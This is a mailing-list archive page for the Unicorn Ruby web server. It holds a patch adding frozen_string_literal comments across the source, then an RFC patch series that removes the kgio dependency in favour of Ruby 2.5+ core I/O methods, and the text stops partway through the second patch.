+++ b/examples/unicorn.conf.minimal.rb
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 # Minimal sample configuration file for Unicorn (not Rack) when used
 # with daemonization (unicorn -D) started in your working directory.
 #
diff --git a/examples/unicorn.conf.rb b/examples/unicorn.conf.rb
index d90bdc4..5bae830 100644
--- a/examples/unicorn.conf.rb
+++ b/examples/unicorn.conf.rb
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 # Sample verbose configuration file for Unicorn (not Rack)
 #
 # This configuration file documents many features of Unicorn
diff --git a/ext/unicorn_http/extconf.rb b/ext/unicorn_http/extconf.rb
index 11099cd..de896fe 100644
--- a/ext/unicorn_http/extconf.rb
+++ b/ext/unicorn_http/extconf.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 require 'mkmf'
 
 have_func("rb_hash_clear", "ruby.h") or abort 'Ruby 2.0+ required'
diff --git a/lib/unicorn.rb b/lib/unicorn.rb
index 564cb30..fb91679 100644
--- a/lib/unicorn.rb
+++ b/lib/unicorn.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 require 'etc'
 require 'stringio'
 require 'raindrops'
diff --git a/lib/unicorn/app/old_rails.rb b/lib/unicorn/app/old_rails.rb
index 1e8c41a..54b3e69 100644
--- a/lib/unicorn/app/old_rails.rb
+++ b/lib/unicorn/app/old_rails.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 # :enddoc:
 # This code is based on the original Rails handler in Mongrel
diff --git a/lib/unicorn/app/old_rails/static.rb b/lib/unicorn/app/old_rails/static.rb
index 2257270..cf34e02 100644
--- a/lib/unicorn/app/old_rails/static.rb
+++ b/lib/unicorn/app/old_rails/static.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 # :enddoc:
 # This code is based on the original Rails handler in Mongrel
 # Copyright (c) 2005 Zed A. Shaw
diff --git a/lib/unicorn/cgi_wrapper.rb b/lib/unicorn/cgi_wrapper.rb
index d9b7fe5..fb43605 100644
--- a/lib/unicorn/cgi_wrapper.rb
+++ b/lib/unicorn/cgi_wrapper.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 # :enddoc:
 # This code is based on the original CGIWrapper from Mongrel
diff --git a/lib/unicorn/configurator.rb b/lib/unicorn/configurator.rb
index b21a01d..3c81596 100644
--- a/lib/unicorn/configurator.rb
+++ b/lib/unicorn/configurator.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 require 'logger'
 
 # Implements a simple DSL for configuring a unicorn server.
diff --git a/lib/unicorn/const.rb b/lib/unicorn/const.rb
index 33ab4ac..8032863 100644
--- a/lib/unicorn/const.rb
+++ b/lib/unicorn/const.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 module Unicorn::Const # :nodoc:
   # default TCP listen host address (0.0.0.0, all interfaces)
diff --git a/lib/unicorn/http_request.rb b/lib/unicorn/http_request.rb
index ab3bd6e..a48dab7 100644
--- a/lib/unicorn/http_request.rb
+++ b/lib/unicorn/http_request.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 # :enddoc:
 # no stable API here
 require 'unicorn_http'
diff --git a/lib/unicorn/http_response.rb b/lib/unicorn/http_response.rb
index 0ed0ae3..3634165 100644
--- a/lib/unicorn/http_response.rb
+++ b/lib/unicorn/http_response.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 # :enddoc:
 # Writes a Rack response to your client using the HTTP/1.1 specification.
 # You use it by simply doing:
diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index ed5bbf1..08fbe40 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 # This is the process manager of Unicorn. This manages worker
 # processes which in turn handle the I/O and application process.
diff --git a/lib/unicorn/launcher.rb b/lib/unicorn/launcher.rb
index 78e8f39..bd3324e 100644
--- a/lib/unicorn/launcher.rb
+++ b/lib/unicorn/launcher.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 # :enddoc:
 $stdout.sync = $stderr.sync = true
diff --git a/lib/unicorn/oob_gc.rb b/lib/unicorn/oob_gc.rb
index db9f2cb..efd9177 100644
--- a/lib/unicorn/oob_gc.rb
+++ b/lib/unicorn/oob_gc.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 # Strongly consider https://github.com/tmm1/gctools if using Ruby 2.1+
 # It is built on new APIs in Ruby 2.1, so it is more intelligent than
diff --git a/lib/unicorn/preread_input.rb b/lib/unicorn/preread_input.rb
index 12eb3e8..c62cc09 100644
--- a/lib/unicorn/preread_input.rb
+++ b/lib/unicorn/preread_input.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 module Unicorn
 # This middleware is used to ensure input is buffered to memory
diff --git a/lib/unicorn/select_waiter.rb b/lib/unicorn/select_waiter.rb
index cb84aab..d11ea57 100644
--- a/lib/unicorn/select_waiter.rb
+++ b/lib/unicorn/select_waiter.rb
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 # fallback for non-Linux and Linux <4.5 systems w/o EPOLLEXCLUSIVE
 class Unicorn::SelectWaiter # :nodoc:
   def get_readers(ready, readers, timeout) # :nodoc:
diff --git a/lib/unicorn/socket_helper.rb b/lib/unicorn/socket_helper.rb
index 06ec2b2..986932f 100644
--- a/lib/unicorn/socket_helper.rb
+++ b/lib/unicorn/socket_helper.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 # :enddoc:
 require 'socket'
 
diff --git a/lib/unicorn/stream_input.rb b/lib/unicorn/stream_input.rb
index 9246f73..23a9976 100644
--- a/lib/unicorn/stream_input.rb
+++ b/lib/unicorn/stream_input.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 # When processing uploads, unicorn may expose a StreamInput object under
 # "rack.input" of the Rack environment when
diff --git a/lib/unicorn/tee_input.rb b/lib/unicorn/tee_input.rb
index 2ccc2d9..b3c6535 100644
--- a/lib/unicorn/tee_input.rb
+++ b/lib/unicorn/tee_input.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 # Acts like tee(1) on an input input to provide a input-like stream
 # while providing rewindable semantics through a File/StringIO backing
diff --git a/lib/unicorn/tmpio.rb b/lib/unicorn/tmpio.rb
index 0bbf6ec..deecd80 100644
--- a/lib/unicorn/tmpio.rb
+++ b/lib/unicorn/tmpio.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 # :stopdoc:
 require 'tmpdir'
 
diff --git a/lib/unicorn/util.rb b/lib/unicorn/util.rb
index b826de4..f28d929 100644
--- a/lib/unicorn/util.rb
+++ b/lib/unicorn/util.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 require 'fcntl'
 module Unicorn::Util # :nodoc:
diff --git a/lib/unicorn/worker.rb b/lib/unicorn/worker.rb
index 4af31be..d2445d5 100644
--- a/lib/unicorn/worker.rb
+++ b/lib/unicorn/worker.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 require "raindrops"
 
 # This class and its members can be considered a stable interface
diff --git a/setup.rb b/setup.rb
index cf1abd9..96cf75a 100644
--- a/setup.rb
+++ b/setup.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 #
 # setup.rb
 #
diff --git a/t/broken-app.ru b/t/broken-app.ru
index d05d7ab..5966bff 100644
--- a/t/broken-app.ru
+++ b/t/broken-app.ru
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 # we do not want Rack::Lint or anything to protect us
 use Rack::ContentLength
 use Rack::ContentType, "text/plain"
diff --git a/t/client_body_buffer_size.ru b/t/client_body_buffer_size.ru
index 44161a5..1a0fb16 100644
--- a/t/client_body_buffer_size.ru
+++ b/t/client_body_buffer_size.ru
@@ -1,4 +1,5 @@
 #\ -E none
+# frozen_string_literal: false
 app = lambda do |env|
   input = env['rack.input']
   case env["PATH_INFO"]
diff --git a/t/detach.ru b/t/detach.ru
index bbd998e..8d35951 100644
--- a/t/detach.ru
+++ b/t/detach.ru
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 use Rack::ContentType, "text/plain"
 fifo_path = ENV["TEST_FIFO"] or abort "TEST_FIFO not set"
 run lambda { |env|
diff --git a/t/env.ru b/t/env.ru
index 388412e..86c3cfa 100644
--- a/t/env.ru
+++ b/t/env.ru
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 use Rack::ContentLength
 use Rack::ContentType, "text/plain"
 run lambda { |env| [ 200, {}, [ env.inspect << "\n" ] ] }
diff --git a/t/fails-rack-lint.ru b/t/fails-rack-lint.ru
index 82bfb5f..8b8b5ec 100644
--- a/t/fails-rack-lint.ru
+++ b/t/fails-rack-lint.ru
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 # This rack app returns an invalid status code, which will cause
 # Rack::Lint to throw an exception if it is present.  This
 # is used to check whether Rack::Lint is in the stack or not.
diff --git a/t/heartbeat-timeout.ru b/t/heartbeat-timeout.ru
index 3eeb5d6..ccc6a8e 100644
--- a/t/heartbeat-timeout.ru
+++ b/t/heartbeat-timeout.ru
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 use Rack::ContentLength
 headers = { 'content-type' => 'text/plain' }
 run lambda { |env|
diff --git a/t/integration.ru b/t/integration.ru
index 888833a..6df481c 100644
--- a/t/integration.ru
+++ b/t/integration.ru
@@ -1,4 +1,5 @@
 #!ruby
+# frozen_string_literal: false
 # Copyright (C) unicorn hackers <unicorn-public@80x24.org>
 # License: GPL-3.0+ <https://www.gnu.org/licenses/gpl-3.0.txt>
 
diff --git a/t/listener_names.ru b/t/listener_names.ru
index edb4e6a..f52c59b 100644
--- a/t/listener_names.ru
+++ b/t/listener_names.ru
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 use Rack::ContentLength
 use Rack::ContentType, "text/plain"
 names = Unicorn.listener_names.inspect # rely on preload_app=true
diff --git a/t/oob_gc.ru b/t/oob_gc.ru
index 224cb06..2ae58a8 100644
--- a/t/oob_gc.ru
+++ b/t/oob_gc.ru
@@ -1,4 +1,5 @@
 #\-E none
+# frozen_string_literal: false
 require 'unicorn/oob_gc'
 use Rack::ContentLength
 use Rack::ContentType, "text/plain"
diff --git a/t/oob_gc_path.ru b/t/oob_gc_path.ru
index 7f40601..5358222 100644
--- a/t/oob_gc_path.ru
+++ b/t/oob_gc_path.ru
@@ -1,4 +1,5 @@
 #\-E none
+# frozen_string_literal: false
 require 'unicorn/oob_gc'
 use Rack::ContentLength
 use Rack::ContentType, "text/plain"
diff --git a/t/pid.ru b/t/pid.ru
index f5fd31f..b49b137 100644
--- a/t/pid.ru
+++ b/t/pid.ru
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 use Rack::ContentLength
 use Rack::ContentType, "text/plain"
 run lambda { |env| [ 200, {}, [ "#$$\n" ] ] }
diff --git a/t/preread_input.ru b/t/preread_input.ru
index 18af221..5f68fe9 100644
--- a/t/preread_input.ru
+++ b/t/preread_input.ru
@@ -1,4 +1,5 @@
 #\-E none
+# frozen_string_literal: false
 require 'digest/md5'
 require 'unicorn/preread_input'
 use Unicorn::PrereadInput
diff --git a/t/reopen-logs.ru b/t/reopen-logs.ru
index c39e8f6..488da85 100644
--- a/t/reopen-logs.ru
+++ b/t/reopen-logs.ru
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 use Rack::ContentLength
 use Rack::ContentType, "text/plain"
 run lambda { |env|
diff --git a/t/t0013.ru b/t/t0013.ru
index 48a3a34..e425093 100644
--- a/t/t0013.ru
+++ b/t/t0013.ru
@@ -1,4 +1,5 @@
 #\ -E none
+# frozen_string_literal: false
 use Rack::ContentLength
 use Rack::ContentType, 'text/plain'
 app = lambda do |env|
diff --git a/t/t0014.ru b/t/t0014.ru
index b0bd2b7..686d214 100644
--- a/t/t0014.ru
+++ b/t/t0014.ru
@@ -1,4 +1,5 @@
 #\ -E none
+# frozen_string_literal: false
 use Rack::ContentLength
 use Rack::ContentType, 'text/plain'
 app = lambda do |env|
diff --git a/t/t0301.ru b/t/t0301.ru
index ce68213..54929b1 100644
--- a/t/t0301.ru
+++ b/t/t0301.ru
@@ -1,4 +1,5 @@
 #\-N --debug
+# frozen_string_literal: false
 run(lambda do |env|
   case env['PATH_INFO']
   when '/vars'
diff --git a/test/aggregate.rb b/test/aggregate.rb
index 5eebbe5..0f32b2f 100755
--- a/test/aggregate.rb
+++ b/test/aggregate.rb
@@ -1,5 +1,6 @@
 #!/usr/bin/ruby -n
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 BEGIN { $tests = $assertions = $failures = $errors = 0 }
 
diff --git a/test/benchmark/dd.ru b/test/benchmark/dd.ru
index 111fa2e..5bd2739 100644
--- a/test/benchmark/dd.ru
+++ b/test/benchmark/dd.ru
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 # This benchmark is the simplest test of the I/O facilities in
 # unicorn.  It is meant to return a fixed-sized blob to test
 # the performance of things in Unicorn, _NOT_ the app.
diff --git a/test/benchmark/ddstream.ru b/test/benchmark/ddstream.ru
index b14c973..fd40ced 100644
--- a/test/benchmark/ddstream.ru
+++ b/test/benchmark/ddstream.ru
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 # This app is intended to test large HTTP responses with or without
 # a fully-buffering reverse proxy such as nginx. Without a fully-buffering
 # reverse proxy, unicorn will be unresponsive when client count exceeds
diff --git a/test/benchmark/readinput.ru b/test/benchmark/readinput.ru
index c91bec3..95c0226 100644
--- a/test/benchmark/readinput.ru
+++ b/test/benchmark/readinput.ru
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 # This app is intended to test large HTTP requests with or without
 # a fully-buffering reverse proxy such as nginx. Without a fully-buffering
 # reverse proxy, unicorn will be unresponsive when client count exceeds
diff --git a/test/benchmark/stack.ru b/test/benchmark/stack.ru
index fc9193f..17a565b 100644
--- a/test/benchmark/stack.ru
+++ b/test/benchmark/stack.ru
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 run(lambda { |env|
   body = "#{caller.size}\n"
   h = {
diff --git a/test/exec/test_exec.rb b/test/exec/test_exec.rb
index 8494452..807f724 100644
--- a/test/exec/test_exec.rb
+++ b/test/exec/test_exec.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 # Don't add to this file, new tests are in Perl 5. See t/README
 FLOCK_PATH = File.expand_path(__FILE__)
 require './test/test_helper'
diff --git a/test/test_helper.rb b/test/test_helper.rb
index d86f83b..0bf3c90 100644
--- a/test/test_helper.rb
+++ b/test/test_helper.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 # Copyright (c) 2005 Zed A. Shaw
 # You can redistribute it and/or modify it under the same terms as Ruby 1.8 or
diff --git a/test/unit/test_ccc.rb b/test/unit/test_ccc.rb
index f518230..a0a2bff 100644
--- a/test/unit/test_ccc.rb
+++ b/test/unit/test_ccc.rb
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 require 'socket'
 require 'unicorn'
 require 'io/wait'
diff --git a/test/unit/test_configurator.rb b/test/unit/test_configurator.rb
index 1298f0e..1a89aca 100644
--- a/test/unit/test_configurator.rb
+++ b/test/unit/test_configurator.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 require 'test/unit'
 require 'tempfile'
diff --git a/test/unit/test_droplet.rb b/test/unit/test_droplet.rb
index 81ad82b..4b2d2d0 100644
--- a/test/unit/test_droplet.rb
+++ b/test/unit/test_droplet.rb
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 require 'test/unit'
 require 'unicorn'
 
diff --git a/test/unit/test_http_parser.rb b/test/unit/test_http_parser.rb
index 697af44..adcc84f 100644
--- a/test/unit/test_http_parser.rb
+++ b/test/unit/test_http_parser.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 # Copyright (c) 2005 Zed A. Shaw
 # You can redistribute it and/or modify it under the same terms as Ruby 1.8 or
diff --git a/test/unit/test_http_parser_ng.rb b/test/unit/test_http_parser_ng.rb
index 425d5ad..fd47246 100644
--- a/test/unit/test_http_parser_ng.rb
+++ b/test/unit/test_http_parser_ng.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 require './test/test_helper'
 require 'digest/md5'
diff --git a/test/unit/test_request.rb b/test/unit/test_request.rb
index 53ae944..9d1b350 100644
--- a/test/unit/test_request.rb
+++ b/test/unit/test_request.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 # Copyright (c) 2009 Eric Wong
 # You can redistribute it and/or modify it under the same terms as Ruby 1.8 or
diff --git a/test/unit/test_server.rb b/test/unit/test_server.rb
index 7ffa48f..5a2252f 100644
--- a/test/unit/test_server.rb
+++ b/test/unit/test_server.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 # Copyright (c) 2005 Zed A. Shaw
 # You can redistribute it and/or modify it under the same terms as Ruby 1.8 or
diff --git a/test/unit/test_signals.rb b/test/unit/test_signals.rb
index 6c48754..49ff3c7 100644
--- a/test/unit/test_signals.rb
+++ b/test/unit/test_signals.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 # Copyright (c) 2009 Eric Wong
 # You can redistribute it and/or modify it under the same terms as Ruby 1.8 or
diff --git a/test/unit/test_socket_helper.rb b/test/unit/test_socket_helper.rb
index a446f06..4363474 100644
--- a/test/unit/test_socket_helper.rb
+++ b/test/unit/test_socket_helper.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 require './test/test_helper'
 require 'tempfile'
diff --git a/test/unit/test_stream_input.rb b/test/unit/test_stream_input.rb
index 7986ca7..7ee98e4 100644
--- a/test/unit/test_stream_input.rb
+++ b/test/unit/test_stream_input.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 require 'test/unit'
 require 'digest/sha1'
diff --git a/test/unit/test_tee_input.rb b/test/unit/test_tee_input.rb
index 607ce87..8f05c77 100644
--- a/test/unit/test_tee_input.rb
+++ b/test/unit/test_tee_input.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 require 'test/unit'
 require 'digest/sha1'
diff --git a/test/unit/test_util.rb b/test/unit/test_util.rb
index bc7b233..ce53b86 100644
--- a/test/unit/test_util.rb
+++ b/test/unit/test_util.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 require './test/test_helper'
 require 'tempfile'
diff --git a/test/unit/test_waiter.rb b/test/unit/test_waiter.rb
index 0995de2..a20994b 100644
--- a/test/unit/test_waiter.rb
+++ b/test/unit/test_waiter.rb
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 require 'test/unit'
 require 'unicorn'
 require 'unicorn/select_waiter'
diff --git a/unicorn.gemspec b/unicorn.gemspec
index e7e3ef7..36700a8 100644
--- a/unicorn.gemspec
+++ b/unicorn.gemspec
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 manifest = File.exist?('.manifest') ?
   IO.readlines('.manifest').map!(&:chomp!) : `git ls-files`.split("\n")
 

^ permalink raw reply related	[relevance 1%]

* [RFC 0-3/3] depend on Ruby 2.5+, eliminate kgio
@ 2023-09-05  9:44  1% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2023-09-05  9:44 UTC (permalink / raw)
  To: unicorn-public

[-- Attachment #1: Type: text/plain, Size: 1658 bytes --]

Explanation (and bulk of the work is in patch 2/3).

I wrote patch 1/3 over 4 years ago since it was simple and
didn't rely on "newer" Ruby 2.3 features.  Patch 2/3 completes
the change and actually depends on 2.5+; while patch 3/3 updates
the gemspec, docs and dependencies for Ruby 2.5+.

I haven't actually used Ruby 2.5 in a while, but I'm still on
Ruby 2.7 since that's what I have in Debian bullseye
(oldstable).

Patch 2/3 could use an extra set of eyes since it's fairly big,
but passes all tests.

Note: I can't benchmark anything since I have limited (shared)
hardware

Eric Wong (3):
  remove kgio from all read(2) and write(2) wrappers
  kill off remaining kgio uses
  update dependency to Ruby 2.5+

 HACKING                         |  2 +-
 README                          |  2 +-
 lib/unicorn.rb                  |  3 +-
 lib/unicorn/http_request.rb     | 18 ++++-----
 lib/unicorn/http_server.rb      | 38 +++++++----------
 lib/unicorn/oob_gc.rb           |  4 +-
 lib/unicorn/socket_helper.rb    | 50 +++--------------------
 lib/unicorn/stream_input.rb     | 20 +++++----
 lib/unicorn/worker.rb           | 10 ++---
 lib/unicorn/write_splat.rb      |  7 ----
 t/README                        |  2 +-
 t/oob_gc.ru                     |  3 --
 t/oob_gc_path.ru                |  3 --
 test/unit/test_request.rb       | 47 ++++++++-------------
 test/unit/test_socket_helper.rb | 72 +++++++--------------------------
 test/unit/test_stream_input.rb  |  2 +-
 test/unit/test_tee_input.rb     |  2 +-
 unicorn.gemspec                 |  5 +--
 18 files changed, 87 insertions(+), 203 deletions(-)
 delete mode 100644 lib/unicorn/write_splat.rb

[-- Attachment #2: 0001-remove-kgio-from-all-read-2-and-write-2-wrappers.patch --]
[-- Type: text/x-diff, Size: 5330 bytes --]

From 36ba7f971c571031101c0b718724bdcb06dd7e03 Mon Sep 17 00:00:00 2001
From: Eric Wong <e@80x24.org>
Date: Sun, 26 May 2019 22:15:44 +0000
Subject: [RFC 1/3] remove kgio from all read(2) and write(2) wrappers

It's fairly easy given unicorn was designed with synchronous I/O
in mind.  The overhead of backtraces from EOFError on
readpartial should be rare given our requirement to only accept
requests from fast, reliable clients on LAN (e.g. nginx or
yet-another-horribly-named-server).
---
 lib/unicorn/http_request.rb |  4 ++--
 lib/unicorn/http_server.rb  |  8 +++++---
 lib/unicorn/stream_input.rb | 20 ++++++++++++--------
 lib/unicorn/worker.rb       |  4 ++--
 4 files changed, 21 insertions(+), 15 deletions(-)

diff --git a/lib/unicorn/http_request.rb b/lib/unicorn/http_request.rb
index e3ad592..8bca60a 100644
--- a/lib/unicorn/http_request.rb
+++ b/lib/unicorn/http_request.rb
@@ -74,11 +74,11 @@ def read(socket)
     e['REMOTE_ADDR'] = socket.kgio_addr
 
     # short circuit the common case with small GET requests first
-    socket.kgio_read!(16384, buf)
+    socket.readpartial(16384, buf)
     if parse.nil?
       # Parser is not done, queue up more data to read and continue parsing
       # an Exception thrown from the parser will throw us out of the loop
-      false until add_parse(socket.kgio_read!(16384))
+      false until add_parse(socket.readpartial(16384))
     end
 
     check_client_connection(socket) if @@check_client_connection
diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index f1b4a54..2f1eb1b 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -389,12 +389,13 @@ def master_sleep(sec)
     # the Ruby itself and not require a separate malloc (on 32-bit MRI 1.9+).
     # Most reads are only one byte here and uncommon, so it's not worth a
     # persistent buffer, either:
-    @self_pipe[0].kgio_tryread(11)
+    @self_pipe[0].read_nonblock(11, exception: false)
   end
 
   def awaken_master
     return if $$ != @master_pid
-    @self_pipe[1].kgio_trywrite('.') # wakeup master process from select
+    # wakeup master process from select
+    @self_pipe[1].write_nonblock('.', exception: false)
   end
 
   # reaps all unreaped workers
@@ -565,7 +566,8 @@ def handle_error(client, e)
       500
     end
     if code
-      client.kgio_trywrite(err_response(code, @request.response_start_sent))
+      code = err_response(code, @request.response_start_sent)
+      client.write_nonblock(code, exception: false)
     end
     client.close
   rescue
diff --git a/lib/unicorn/stream_input.rb b/lib/unicorn/stream_input.rb
index 41d28a0..9246f73 100644
--- a/lib/unicorn/stream_input.rb
+++ b/lib/unicorn/stream_input.rb
@@ -49,8 +49,7 @@ def read(length = nil, rv = '')
         to_read = length - @rbuf.size
         rv.replace(@rbuf.slice!(0, @rbuf.size))
         until to_read == 0 || eof? || (rv.size > 0 && @chunked)
-          @socket.kgio_read(to_read, @buf) or eof!
-          filter_body(@rbuf, @buf)
+          filter_body(@rbuf, @socket.readpartial(to_read, @buf))
           rv << @rbuf
           to_read -= @rbuf.size
         end
@@ -61,6 +60,8 @@ def read(length = nil, rv = '')
       read_all(rv)
     end
     rv
+  rescue EOFError
+    return eof!
   end
 
   # :call-seq:
@@ -83,9 +84,10 @@ def gets
     begin
       @rbuf.sub!(re, '') and return $1
       return @rbuf.empty? ? nil : @rbuf.slice!(0, @rbuf.size) if eof?
-      @socket.kgio_read(@@io_chunk_size, @buf) or eof!
-      filter_body(once = '', @buf)
+      filter_body(once = '', @socket.readpartial(@@io_chunk_size, @buf))
       @rbuf << once
+    rescue EOFError
+      return eof!
     end while true
   end
 
@@ -107,14 +109,15 @@ def each
   def eof?
     if @parser.body_eof?
       while @chunked && ! @parser.parse
-        once = @socket.kgio_read(@@io_chunk_size) or eof!
-        @buf << once
+        @buf << @socket.readpartial(@@io_chunk_size)
       end
       @socket = nil
       true
     else
       false
     end
+  rescue EOFError
+    return eof!
   end
 
   def filter_body(dst, src)
@@ -127,10 +130,11 @@ def read_all(dst)
     dst.replace(@rbuf)
     @socket or return
     until eof?
-      @socket.kgio_read(@@io_chunk_size, @buf) or eof!
-      filter_body(@rbuf, @buf)
+      filter_body(@rbuf, @socket.readpartial(@@io_chunk_size, @buf))
       dst << @rbuf
     end
+  rescue EOFError
+    return eof!
   ensure
     @rbuf.clear
   end
diff --git a/lib/unicorn/worker.rb b/lib/unicorn/worker.rb
index 5ddf379..ad5814c 100644
--- a/lib/unicorn/worker.rb
+++ b/lib/unicorn/worker.rb
@@ -65,7 +65,7 @@ def soft_kill(sig) # :nodoc:
     end
     # writing and reading 4 bytes on a pipe is atomic on all POSIX platforms
     # Do not care in the odd case the buffer is full, here.
-    @master.kgio_trywrite([signum].pack('l'))
+    @master.write_nonblock([signum].pack('l'), exception: false)
   rescue Errno::EPIPE
     # worker will be reaped soon
   end
@@ -73,7 +73,7 @@ def soft_kill(sig) # :nodoc:
   # this only runs when the Rack app.call is not running
   # act like a listener
   def kgio_tryaccept # :nodoc:
-    case buf = @to_io.kgio_tryread(4)
+    case buf = @to_io.read_nonblock(4, exception: false)
     when String
       # unpack the buffer and trigger the signal handler
       signum = buf.unpack('l')

[-- Attachment #3: 0002-kill-off-remaining-kgio-uses.patch --]
[-- Type: text/x-diff, Size: 25476 bytes --]

From 03ec6e69fc6219a40aa8db368abe53017cd164e3 Mon Sep 17 00:00:00 2001
From: Eric Wong <bofh@yhbt.net>
Date: Tue, 5 Sep 2023 06:43:20 +0000
Subject: [RFC 2/3] kill off remaining kgio uses

kgio is an extra download and shared object which costs users
bandwidth, disk space, startup time and memory.  Ruby 2.3+
provides `Socket#accept_nonblock(exception: false)' support
in addition to `exception: false' support in IO#*_nonblock
methods from Ruby 2.1.

We no longer distinguish between TCPServer and UNIXServer as
separate classes internally; instead favoring the `Socket' class
of Ruby for both.  This allows us to use `Socket#accept_nonblock'
and get a populated `Addrinfo' object off accept4(2)/accept(2)
without resorting to a getpeername(2) syscall (kgio avoided
getpeername(2) in the same way).

The downside is there's more Ruby-level argument passing and
stack usage on our end with HttpRequest#read_headers (formerly
HttpRequest#read).  I chose this tradeoff since advancements in
Ruby itself can theoretically mitigate the cost of argument
passing, while syscalls are a high fixed cost given modern CPU
vulnerability mitigations.

Note: no benchmarks have been run since I don't have a suitable
system.
---
 lib/unicorn.rb                  |  3 +-
 lib/unicorn/http_request.rb     | 14 +++----
 lib/unicorn/http_server.rb      | 30 +++++---------
 lib/unicorn/oob_gc.rb           |  4 +-
 lib/unicorn/socket_helper.rb    | 50 +++--------------------
 lib/unicorn/worker.rb           |  6 +--
 t/oob_gc.ru                     |  3 --
 t/oob_gc_path.ru                |  3 --
 test/unit/test_request.rb       | 47 ++++++++-------------
 test/unit/test_socket_helper.rb | 72 +++++++--------------------------
 test/unit/test_stream_input.rb  |  2 +-
 test/unit/test_tee_input.rb     |  2 +-
 unicorn.gemspec                 |  1 -
 13 files changed, 61 insertions(+), 176 deletions(-)

diff --git a/lib/unicorn.rb b/lib/unicorn.rb
index b817b77..564cb30 100644
--- a/lib/unicorn.rb
+++ b/lib/unicorn.rb
@@ -1,7 +1,6 @@
 # -*- encoding: binary -*-
 require 'etc'
 require 'stringio'
-require 'kgio'
 require 'raindrops'
 require 'io/wait'
 
@@ -112,7 +111,7 @@ def self.log_error(logger, prefix, exc)
   F_SETPIPE_SZ = 1031 if RUBY_PLATFORM =~ /linux/
 
   def self.pipe # :nodoc:
-    Kgio::Pipe.new.each do |io|
+    IO.pipe.each do |io|
       # shrink pipes to minimize impact on /proc/sys/fs/pipe-user-pages-soft
       # limits.
       if defined?(F_SETPIPE_SZ)
diff --git a/lib/unicorn/http_request.rb b/lib/unicorn/http_request.rb
index 8bca60a..ab3bd6e 100644
--- a/lib/unicorn/http_request.rb
+++ b/lib/unicorn/http_request.rb
@@ -61,7 +61,7 @@ def self.check_client_connection=(bool)
   # returns an environment hash suitable for Rack if successful
   # This does minimal exception trapping and it is up to the caller
   # to handle any socket errors (e.g. user aborted upload).
